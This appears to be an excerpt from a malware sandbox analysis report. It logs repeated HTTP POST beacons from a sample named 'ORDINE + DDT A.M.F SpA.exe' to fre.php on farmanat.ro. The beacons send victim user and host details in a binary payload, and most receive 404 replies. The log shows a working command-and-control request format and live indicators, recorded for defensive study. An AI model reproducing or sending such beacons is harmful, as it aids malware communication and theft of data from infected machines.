                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              498192.168.11.2050342176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:23.270426035 CET7009OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:23.303985119 CET7009OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:23.354069948 CET7009INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              499192.168.11.2050343176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:23.770524979 CET7010OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:23.804945946 CET7010OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:23.855377913 CET7011INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.11.2049824176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:03.269522905 CET6306OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:03.302797079 CET6306OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:03.352428913 CET6306INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              50192.168.11.2049886176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:33.744999886 CET6379OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:33.778672934 CET6379OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:33.827759027 CET6380INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              500192.168.11.2050344176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:24.270030022 CET7012OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:24.303558111 CET7012OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:24.353456020 CET7012INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              501192.168.11.2050345176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:24.703352928 CET7013OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:24.736711979 CET7013OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:24.805270910 CET7013INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              502192.168.11.2050346176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:25.197757959 CET7014OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:25.232018948 CET7014OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:25.303616047 CET7015INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              503192.168.11.2050347176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:25.690005064 CET7015OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:25.723462105 CET7016OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:25.791414976 CET7016INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              504192.168.11.2050348176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:26.225157022 CET7017OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:26.259187937 CET7017OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:26.315299988 CET7017INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              505192.168.11.2050349176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:26.744009018 CET7018OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:26.778235912 CET7018OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:26.827974081 CET7019INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              506192.168.11.2050350176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:27.252180099 CET7019OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:27.285602093 CET7020OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:27.335648060 CET7020INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              507192.168.11.2050351176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:27.764926910 CET7021OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:27.799151897 CET7021OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:27.849395990 CET7021INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              508192.168.11.2050352176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:28.263374090 CET7022OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:28.296890974 CET7022OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:28.348093033 CET7023INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              509192.168.11.2050353176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:28.747392893 CET7023OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:28.781620026 CET7024OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:28.834002972 CET7024INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              51192.168.11.2049887176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:34.343229055 CET6380OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:34.377456903 CET6381OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:34.427978992 CET6381INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              510192.168.11.2050354176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:29.178594112 CET7025OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:29.213073015 CET7025OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:29.265156984 CET7025INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              511192.168.11.2050355176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:29.689702988 CET7026OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:29.723548889 CET7026OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:29.779525995 CET7027INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              512192.168.11.2050356176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:30.160809040 CET7027OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:30.194834948 CET7028OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:30.252974033 CET7028INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              513192.168.11.2050357176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:30.684075117 CET7029OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:30.717711926 CET7029OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:30.771226883 CET7029INHTTP/1.1 404 Not Found
                                              Server: nginx
